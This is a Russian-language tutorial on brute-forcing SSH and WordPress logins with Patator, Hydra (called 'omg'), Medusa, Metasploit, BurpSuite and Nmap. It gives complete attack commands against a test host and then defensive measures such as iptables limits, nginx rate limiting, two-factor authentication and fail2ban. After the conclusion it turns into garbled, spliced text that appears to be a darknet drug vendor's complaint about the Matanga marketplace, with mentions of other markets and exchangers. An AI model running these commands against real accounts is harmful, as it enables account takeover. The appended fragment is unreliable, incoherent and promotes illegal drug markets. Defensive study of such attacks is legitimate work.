Brute-force (атака полным перебором) – метод решения математических задач, сложность которого зависит от количества всех возможных решений. Сам же термин brute-force обычно используется в контексте хакерских атак, когда злоумышленник пытается подобрать логин/пароль к какой-либо учетной записи или сервису.Рассмотрим инструменты, которые можно использовать для выполнения brute-force атак на SSH и WEB-сервисы, доступные в Kali Linux (Patator, Medusa, omg, Metasploit), а также BurpSuite.
Все материалы, предоставленные в рамках данной статьи, предназначены для использования исключительно в учебных целях. Использование материалов в противоправных и противозаконных запрещено.
Brute-force SSH
Для примера возьмем тестовую машину 192.168.60.50 и попробуем подобрать пароль пользователя test по SSH. Мы будем использовать популярные пароли из стандартного словаря rockyou.txt.
Patator
Для подбора пароля средствами Patator используем команду:patator ssh_login host=192.168.60.50 user=test password=FILE0 0=/root/wordlist -x ignore:mesg=’Authentication failed’где:
ssh_login — необходимый модуль
host – наша цель
user – логин пользователя, к которому подбирается пароль или файл с логинами для множественного подбора
password – словарь с паролями
-x ignore:mesg=’Authentication failed’ — команда не выводить на экран строку, имеющую данное сообщение. Параметр фильтрации подбирается индивидуально.
omg
Для подбора пароля используя omg выполним команду:omg -V -f -t 4 -l test -P /root/wordlist ssh://192.168.60.50где:
-V – показывать пару логин+пароль во время перебора
-f – остановка как только будет найден пароль для указанного логина
-P – путь до словаря с паролями
ssh://192.168.60.50 – указание сервиса и IP-адрес жертвы
Medusa
Для подбора пароля с использованием Medusa выполним команду:medusa -h 192.168.60.50 -u test -P /root/wordlist -M ssh -f -v 6где:
-h – IP-адрес жертвы
-u – логин
-P – путь к словарю
-M – выбор модуля
-f – остановка после нахождения валидной пары логин/пароль
-v – настройка отображения сообщений на экране во время процесса подбора
Metasploit
Произведем поиск инструмента для проведения brute-force атаки по SSH:
search ssh_login и получили ответ:Задействуем модуль:use auxiliary/scanner/ssh/ssh_loginДля просмотра необходимых параметров, воспользуемся командой show options. Для нас это:
rhosts – IP-адрес жертвы
rport – порт
username – логин SSH
userpass_file – путь до словаря
stop_on_success – остановка, как только найдется пара логин/пароль
threads – количество потоковУказание необходимых параметров производится через команду "set".set rhosts 192.168.60.50
set username test
set userpass_file /root/wordlist
set stop_on_success yes
set threads 4
set rport 22Указав необходимые параметры набираем команду "run" и ждем.Противодействие
Ограничить количество устанавливаемых соединений с использованием межсетевого экрана. Пример настройки iptables:-A INPUT -i eth0 -p tcp --dport 22 -m connlimit --connlimit-above 1 --connlimit-mask 32 -j REJECT --reject-with tcp-reset.Такое правило установит ограничение доступа к SSH для каждого IP-адреса до 1 соединения в секунду, значительно усложнив перебор. Также эффективным решением может быть использование двухфакторной аутентификации (например, используя eToken) или аутентификации с использованием ключевой пары, а также использование ACL на основе IP-адресов.Brute-force WordPress
Рассмотрим другой пример — подбор пароля окна авторизации веб-формы.Для примера будем подбирать пароль от учетной записи администратора wordpress.
BurpSuite
Для начала нам необходимо понять, как происходит процесс авторизации. Для этого мы будем использовать BurpSuite. Нам необходимо попробовать авторизоваться с любым паролем и логином, чтобы посмотреть какие запросы проходят через BurpSuite.Отлично, мы увидели POST запрос для авторизации с ним мы и будем работать.
В BODY указано какой логин и пароль проверялись, а значит, мы можем попробовать самостоятельно подставить нужные нам значения.
Передаем этот запрос в Intruder и там выбираем необходимые параметры для атаки. В пункте Payload Positions тип атаки оставляем sniper, но для проверки оставляем только параметр pwd. Таким образом, при атаке будет изменяться только этот параметр.Загружаем необходимый словарь и начинаем атаку.Из поведения веб-приложения мы видим, что неверный пароль возвращает код ответа 200. После перебора словаря, видим, что один из паролей дал ответ с кодом 302 — он и является верным.Данный метод перебора занимает намного больше времени, чем при использовании Patator, omg, Medusa и т.д. Даже с учетом того, что мы взяли небольшой словарь, BurpSuite перебирал словарь около 40 минут.
omg
Попробуем подобрать пароль с помощью omg.
Как мы уже знаем, при неверной авторизации возвращается код 200, а при успешной – 302. Попробуем использовать эту информацию.
Для запуска используем команду:omg -V -f -l admin -P /root/wordlist -t 4 http-post-form://192.168.60.50 -m "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1:S=302"Здесь мы указываем обязательные параметры:
-l – имя пользователя
-P – словарь с паролями
-t – количество потоков
http-post-form – тип формы, у нас POST.
/wp-login.php – это URL страницы с авторизацией
^USER^ — показывает куда подставлять имя пользователя
^PASS^ — показывает куда подставлять пароль из словаря
S=302 – указание на какой ответ опираться omg. В нашем случае, ответ 302 при успешной авторизации.
Patator
Как мы уже знаем, при неудачной авторизации возвращается код 200, а при удачной – 302. Будем использовать тот же принцип, что и с omg:
Запуск производится командой:patator http_fuzz url=http://192.168.60.50/wp-login.php method=POST body='log=admin&pwd=FILE0&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1' 0=/root/wordlist -t 4 before_urls=http://192.168.60.50/wp-login.php -x ignore:code=200 accept_cookie=1http_fuzz – модуль для brute-force атаки http
url – адрес страницы с авторизацией
FILE0 — путь до словаря с паролями
body – информация, которая передается в POST запросе при авторизации
-t — количество потоков
-x – В данном случае мы указали команду не выводить на экран сообщения строки, содержащие параметр с кодом 200
accept_cookie – сохранение параметра cookie и передачи его в следующий запрос
Как итог – нам удалось подобрать пароль.
Nmap
Утилита Nmap позволяет в том числе производить подбор паролей для веб-форм авторизации, если использовать скрипт http-wordpress-brute с соответствующими аргументами:
--script-args – добавление аргументов
user или userdb – логин или файла с логинами
pass или passdb — указание пароля или словаря
thread – количество потоков
firstonly=true – выводить результат после первого же правильного пароляnmap 192.168.60.50 --script http-wordpress-brute --script-args 'user= admin,passdb= /root/wordlist, http-wordpress-brute.thread=3, brute.firstonly=true'Противодействие
Ограничить (усложнить) brute-force атаки на web-приложения можно средствами iptables (по аналогии с SSH) и средствами nginx. Для этого необходимо создать зону лимитов:
...
limit_req_zone $binary_remote_addr zone=req_limits:10m rate=30r/s;
...
и задействовать ее:
location / {
...
limit_req zone=req_limits burst=10;
limit_req_status 429;
...
}
Такие настройки позволят ограничить количество запросов с одного IP-адреса до 40 в секунду.Усложнить задачу перебора можно используя следующие методы:
— Применение межсетевого экрана и прочего ПО для ограничения количества обращений к защищаемому сервису. О том, как мы используем машинное обучение для выявления подобных атак (в том числе распределенных), можно почитать в статье.
— Использование средств, препятствующих быстрой проверке корректности ключа (например, Captcha).Заключение
В данной статье мы поверхностно рассмотрели некоторые популярные инструменты. Сократить риск подбора пароля можно, следуя следующим рекомендациям:
— используйте устойчивые к подбору пароли;
— не создавайте пароли, используя личную информацию, например: дату рождения или имя + дата рождения или мобильный телефон;
— регулярно меняйте пароль;
— на всех аккаунтах применяйте уникальные пароли.Подобные рекомендации (как и рекомендации по безопасной веб-разработке) мало кто соблюдает, поэтому необходимо использовать различные программные решения, позволяющие:
— ограничить подключение по IP-адресу, или, если это невозможно, ограничить одновременное количество соединений с сервисом (средствами iptables, nginx и прочими);
— использовать двухфакторную аутентификацию;
— выявлять и блокировать подобные атаки средствами SIEM, WAF или другими (например, fail2ban).
Далее я даю следующий адрес на
com 3кг ценой в 600т.р адрес поднят в тот же день. К примеру был такой контакт в джаббере register (другие администраторы так же о нем отзывались как
onion главный тренер команды) который являлся приближеннымланс. Бегите скорее если все еще там размещаетесь! Короче кинули везде где только могли stars: Вот скриншоты: Кстати вот тут на скрине он говорит вернул сумму долга, ток куда и кому не ясно денег я так и не увидел) к тому же еще и сумма не та) Ну что же друзья. Я много раз об этом думал и у меня возникло ощущение продуманного кидалова дабы поправить финансовые дела площаки. Первая пачка скриншотов собственно о главном. Тут история такая что клиент обещал расплатиться за 2 недели однако за это время не внес ни копейки. Скриншоты прикладываю. Я добился первых ответов однако. Элементарно, хотя бы серьезные задержки в выплатах средств. Снизу вверх. Я просто вообще всю переписку делаю что бы не было потом что я что то вырезал или недоговариваю. Кстати этот покупатель оказался хорошим человеком и сделал скриншоты, дальнейшей переписки где он скинул доказательства перевода средств при надобности тоже скину. Для них добро делаешь, помогаешь развиваться магазинам на их площадке, а они игнорят да еще в итоге мне с 4-5 кредиторов деньги не то что не были начислины даже проигнорен был вопрос их посчитать. /odeepweb Добрый день друзья и подруги. Но случилось такое "НО". И так выше мы уже разобрались с тем, что площадка всячески отказывается выплачивать мне деньги за проданный у них товар. Пополнение баланса на Matanga Сайт Matanga / Матанга один из старейших даркнет маркетплейсов. Я выдаю первый адрес на 1кг и второй адрес на 2кг главному администратору. А для тех кто
blacksprut продают сегодня и сейчас и выводят каждый день, платят курьерам раз в несколько дней - это равносильно смерти! Друзья если вы думаете что вам задерживают и потом выплаттят!? Тут без коментов и так все ясно, что началось долго продуманно разводилово, что я неправ. После чего на торговой площадке matanga прекратился автоматический вывод средств на биткоин кошельки пользователей, параллели провести не сложно у них там зависли бабки всех магазинов. Кредиты матанги. Работали отлично поначалу. После последнего скриншота что вы видите выше из данногго тикета меня удалили вообще:bravo наверное в надежде что скриншотов я не сделал и не смогу ничего предъявить. На моем месте может оказаться любой из вас! Конкретное кидалово. Ну что ж ладно. Но это главный администатор, второй человек после владельца площадки! Комментировать скриншоты я тоже буду снизу вверх по мере диалога. Сейчас мне до сих пор не перевели деньги с баланса которые там уже были, не считая этой сделки на 600к это еще 270 тысяч было! Система диалогов на матанге ебанутая. Давайте посмотрим что из этого вышло! Вот он начислил эти 800к что показаны на скриншоте ниже как вы видели на скриншоте номер 5 я ошибся там где 3кг положил 2кг, по этому оплата последовала естесственно за 4кг что вы видите на скриншоте. О той самой главной сделке, за которую меня кинула администрация матанги на 600 тысяч сделки и на 250-270 тысяч на балансе.(на скрине увидите сумму). Причем будут угрожать что если хоть что то вынесется на публику, то 100 вы ничего не получите! Тут у меня вес недосох перенесли. Владелец матанги отказался от своих слов и ничего решать не стал, в том числе и о переводе денег с баланса уже шоты. У нас были хорошие отношения с аминистрацией матанги. Пытался я всячески выйти на этого главного бухгалтера, владельца площадки, что бы лично обсудить что же за безобразие такое и в один прекрасный день мне это удалось. Тут как не крути все на лицо. Тут уже 2 недели игнора на скрине. Подборка Обменников BetaChange (Telegram) Перейти. Как это было!? Вот мы видим как мне начисляют за выданные адреса деньги на счет.